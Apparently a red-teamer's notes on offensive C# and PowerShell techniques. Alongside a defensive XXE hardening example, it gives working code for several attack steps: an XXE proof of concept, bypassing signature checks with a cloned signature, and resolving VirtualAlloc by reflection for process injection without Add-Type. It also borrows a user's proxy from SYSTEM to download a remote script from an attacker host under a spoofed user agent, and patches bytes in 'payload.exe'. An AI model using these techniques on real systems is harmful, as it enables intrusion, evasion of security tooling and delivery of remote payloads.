xct's notes
C#

Embedded Dependencies

Install-Package Costura.Fody

Costura.Fody embeds the referenced assemblies into the output assembly as resources at build time, so a tool that pulls in third-party DLLs still ships (and drops) as a single file.

XXE

XmlDocument PoC (out-of-band: the parser fetches the external entity, so a hit on the listener at 127.0.0.1:8000 proves XXE even if nothing is reflected back):

<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM 'http://127.0.0.1:8000/hi'>]><doc>&win;</doc>

This works against System.Xml.XmlDocument on .NET Framework before 4.5.2, where XmlResolver defaults to an XmlUrlResolver, unless the application explicitly set XmlResolver to null. From 4.5.2 onward the default is null, so the entity is only resolved if the application assigned a resolver itself.
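The following is an added example, not from the original notes, that reproduces the vulnerable and the hardened XmlDocument configuration side by side from PowerShell (any Windows PowerShell or PowerShell 7 host, since the resolver is set explicitly rather than relying on the runtime default). The target file path, its content and the function names are assumptions; a local file:// URI is used instead of the listener URL so the script runs offline.

```powershell
# Constructed target: a local file standing in for the attacker-chosen SYSTEM URI
$secretPath = Join-Path $env:TEMP 'xxe-secret.txt'
Set-Content -Path $secretPath -Value 'SECRET-CONTENT' -NoNewline
$secretUri = ([System.Uri]$secretPath).AbsoluteUri      # file:///C:/.../xxe-secret.txt

# Same shape as the PoC above, with the local file URI substituted for the listener
$payload = "<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM '$secretUri'>]><doc>&win;</doc>"

function Invoke-VulnerableParse([string]$Xml) {
    $doc = New-Object System.Xml.XmlDocument
    # Explicitly reproduce the pre-4.5.2 default so behaviour is the same on every runtime
    $doc.XmlResolver = New-Object System.Xml.XmlUrlResolver
    $doc.LoadXml($Xml)
    return $doc.DocumentElement.InnerText
}

function Invoke-HardenedParse([string]$Xml) {
    # Refuse DTDs outright and give the document no resolver it could fetch anything with
    $settings = New-Object System.Xml.XmlReaderSettings
    $settings.DtdProcessing = [System.Xml.DtdProcessing]::Prohibit
    $settings.XmlResolver = $null
    $reader = [System.Xml.XmlReader]::Create((New-Object System.IO.StringReader($Xml)), $settings)
    $doc = New-Object System.Xml.XmlDocument
    $doc.XmlResolver = $null
    $doc.Load($reader)
    return $doc.DocumentElement.InnerText
}

# The vulnerable parse returns the file content; the hardened one throws an XmlException on the DTD
"Vulnerable parse returned: $(Invoke-VulnerableParse $payload)"
try {
    "Hardened parse returned: $(Invoke-HardenedParse $payload)"
} catch {
    "Hardened parse refused the document: $($_.Exception.Message)"
}
Remove-Item $secretPath
```

DtdProcessing.Prohibit rejects any document with a DOCTYPE, which is the right default for untrusted input; if an application legitimately needs internal DTDs, DtdProcessing.Ignore together with XmlResolver = $null still blocks the external fetch.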

Process Injection

Clone Signature

A cloned signature will not validate against a trusted chain, but if the program only checks that the binary carries a signature, rather than validating the whole chain up to a trusted root, it works ;-)

Look for Assemblies that can be used for Reflection Attacks

# Walk every assembly loaded in the current AppDomain, print its path and list the
# static members of any type named Microsoft.Win32.UnsafeNativeMethods (the P/Invoke
# wrappers that can be reached via reflection without Add-Type)
$Assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
$Assemblies |
ForEach-Object {
    $_.Location
    $_.GetTypes() |
    ForEach-Object {
        $_ | Get-Member -Static | Where-Object {
            $_.TypeName.Equals('Microsoft.Win32.UnsafeNativeMethods')
        }
    } 2> $null
}
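As an added example (not from the original notes), here is what the search above is typically used for: resolving a native export address through the GetModuleHandle/GetProcAddress wrappers that System.dll's internal Microsoft.Win32.UnsafeNativeMethods type exposes, so no Add-Type (and therefore no csc.exe spawn or temporary .cs file) is needed. It assumes Windows PowerShell on .NET Framework, where System.dll is a GAC assembly carrying that type; the function name is an assumption.

```powershell
function Get-NativeProcAddress {
    param(
        [Parameter(Mandatory)][string]$Module,     # e.g. kernel32.dll, must already be loaded
        [Parameter(Mandatory)][string]$Procedure   # e.g. VirtualAlloc
    )
    # On .NET Framework System.dll sits in the GAC and carries the internal UnsafeNativeMethods type
    $systemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -and $_.Location.Split('\')[-1] -eq 'System.dll' }
    if (-not $systemAssembly) { throw 'System.dll not found in the GAC (PowerShell 7 / .NET Core host?)' }
    $unsafe = $systemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
    if ($null -eq $unsafe) { throw 'Microsoft.Win32.UnsafeNativeMethods not present in this System.dll' }

    $getModuleHandle = $unsafe.GetMethod('GetModuleHandle')
    # GetProcAddress has more than one overload; select the (HandleRef, string) one explicitly
    $getProcAddress = $unsafe.GetMethod('GetProcAddress',
        [Type[]]@([System.Runtime.InteropServices.HandleRef], [string]))

    $moduleHandle = $getModuleHandle.Invoke($null, @($Module))
    if ($moduleHandle -eq [IntPtr]::Zero) { throw "$Module is not loaded in this process" }

    # HandleRef just wraps the module handle; the wrapper object is irrelevant here
    $wrapper   = New-Object IntPtr
    $handleRef = New-Object System.Runtime.InteropServices.HandleRef($wrapper, $moduleHandle)
    $address   = $getProcAddress.Invoke($null,
        @([System.Runtime.InteropServices.HandleRef]$handleRef, $Procedure))
    if ($address -eq [IntPtr]::Zero) { throw "$Procedure is not exported by $Module" }
    return $address
}

# Usage: should print a non-zero address inside kernel32's image
'VirtualAlloc -> 0x{0:X}' -f (Get-NativeProcAddress -Module kernel32.dll -Procedure VirtualAlloc).ToInt64()
```

The returned IntPtr can then be bound with [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer against a delegate type built in a dynamic assembly, which is how the rest of this technique avoids Add-Type. On PowerShell 7 (.NET Core) System.dll is a facade and the lookup fails, which is why the function checks for a null type instead of assuming.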

Dynamically resolve Proxy via PowerShell

Sometimes we execute as SYSTEM and still need to use the box's proxy settings to call back to us. SYSTEM's own HKCU is not the user's, so we find a loaded user hive under HKEY_USERS (a user's hive is only loaded while that user is logged on), read the proxy setting from it and copy it into the process-wide default proxy.

New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
# First real user SID (S-1-5-21-...), skipping the *_Classes hives; substring(10) strips "HKEY_USERS" and keeps the leading backslash
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*" -and $key.Name -notlike "*_Classes") {$start = $key.Name.substring(10);break}}
$proxy=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxy")
$wc = new-object system.net.WebClient
$wc.Headers.Add('User-Agent', "Legit User Agent")
$wc.DownloadString("http://<ip>/script.ps1")
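The snippet above assumes the first user hive has a proxy configured and that ProxyServer holds a bare host:port. As an added example (not from the original notes), the version below goes further: it skips hives where ProxyEnable is 0 (direct connection, or PAC via AutoConfigURL, in which case ProxyServer is stale), handles the per-protocol "http=host:port;https=host:port" form, and honours the user's bypass list. Function names and the callback URL are assumptions.

```powershell
function Get-LoadedUserProxy {
    # Walk the loaded user hives under HKEY_USERS and return the first one with an enabled static proxy
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $userHives = Get-ChildItem 'HKU:\' | Where-Object {
        $_.PSChildName -like 'S-1-5-21-*' -and $_.PSChildName -notlike '*_Classes'
    }
    foreach ($hive in $userHives) {
        $key = "HKU:\$($hive.PSChildName)\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
        $s = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        # ProxyEnable=0 means direct connection or PAC (AutoConfigURL); ProxyServer is then not in use
        if ($null -eq $s -or $s.ProxyEnable -ne 1 -or [string]::IsNullOrEmpty($s.ProxyServer)) { continue }
        return [pscustomobject]@{
            Sid           = $hive.PSChildName
            ProxyServer   = $s.ProxyServer
            ProxyOverride = $s.ProxyOverride
        }
    }
}

function ConvertTo-ProxyUri {
    param([string]$ProxyServer, [string]$Scheme = 'http')
    # Two on-disk forms: "host:port" for every protocol, or "http=h:p;https=h:p;ftp=h:p;socks=h:p"
    if ($ProxyServer -notmatch '=') { return "http://$ProxyServer" }
    foreach ($entry in $ProxyServer -split ';') {
        $name, $value = $entry -split '=', 2
        if ($name -eq $Scheme -and $value) { return "http://$value" }
    }
}

$proxyInfo = Get-LoadedUserProxy
if ($null -eq $proxyInfo) { throw 'no loaded user hive has a static proxy enabled' }
$uri = ConvertTo-ProxyUri -ProxyServer $proxyInfo.ProxyServer
if (-not $uri) { throw "no http entry in ProxyServer value '$($proxyInfo.ProxyServer)'" }

# Honour the user's bypass list; "<local>" is the Internet Settings token for "bypass on local"
$bypass      = @($proxyInfo.ProxyOverride -split ';' | Where-Object { $_ -and $_ -ne '<local>' })
$bypassLocal = $proxyInfo.ProxyOverride -like '*<local>*'
$webProxy = New-Object System.Net.WebProxy($uri, $bypassLocal, [string[]]$bypass)
[System.Net.WebRequest]::DefaultWebProxy = $webProxy
"Using proxy $uri from hive $($proxyInfo.Sid); bypass: $($bypass -join ', ')"

$wc = New-Object System.Net.WebClient
$wc.Headers.Add('User-Agent', 'Legit User Agent')
$wc.DownloadString('http://<ip>/script.ps1')
```

If the proxy requires authentication, setting $webProxy.UseDefaultCredentials = $true from a SYSTEM context presents the machine account, which the proxy may or may not accept; the user's own cached credentials are not available this way.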

Convert .NET Assembly to JScript

Edit Bytes in Binary

# Read the whole file, overwrite the byte at offset 200 and write it back in place
$bytes = [System.IO.File]::ReadAllBytes("payload.exe")
$bytes[200] = 0xFF
[System.IO.File]::WriteAllBytes("payload.exe", $bytes)
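The snippet above patches one known offset. As an added example (not from the original notes), the functions below generalise it to locating a byte sequence and overwriting every occurrence in place, which is the usual shape of "patch this string or signature out of a binary". The function names and the scratch file are assumptions; the sample content is constructed so the script runs offline.

```powershell
function Find-BytePattern {
    param([byte[]]$Data, [byte[]]$Pattern)
    # Plain linear scan; fast enough for binaries of a few MB
    $offsets = New-Object System.Collections.Generic.List[int]
    for ($i = 0; $i -le $Data.Length - $Pattern.Length; $i++) {
        $j = 0
        while ($j -lt $Pattern.Length -and $Data[$i + $j] -eq $Pattern[$j]) { $j++ }
        if ($j -eq $Pattern.Length) { $offsets.Add($i) }
    }
    return $offsets.ToArray()
}

function Set-BytePattern {
    param([string]$Path, [byte[]]$Find, [byte[]]$Replace)
    # In-place only: a length change would shift every offset behind the patch
    if ($Find.Length -ne $Replace.Length) { throw 'Find and Replace must have equal length' }
    $bytes   = [System.IO.File]::ReadAllBytes($Path)
    $offsets = Find-BytePattern -Data $bytes -Pattern $Find
    foreach ($offset in $offsets) {
        [Array]::Copy($Replace, 0, $bytes, $offset, $Replace.Length)
    }
    [System.IO.File]::WriteAllBytes($Path, $bytes)
    return $offsets
}

# Constructed sample: a scratch file with the same marker at two offsets
$sample  = Join-Path $env:TEMP 'patch-demo.bin'
[System.IO.File]::WriteAllBytes($sample, [System.Text.Encoding]::ASCII.GetBytes('head MARKER body MARKER tail'))
$find    = [System.Text.Encoding]::ASCII.GetBytes('MARKER')
$replace = [System.Text.Encoding]::ASCII.GetBytes('XXXXXX')

$patched = Set-BytePattern -Path $sample -Find $find -Replace $replace
"patched offsets: $($patched -join ', ')"
[System.Text.Encoding]::ASCII.GetString([System.IO.File]::ReadAllBytes($sample))
Remove-Item $sample
```

Any byte change invalidates an Authenticode signature and the PE header checksum, so a patched binary should be re-signed (or the signature stripped) before it is expected to pass checks that look at either.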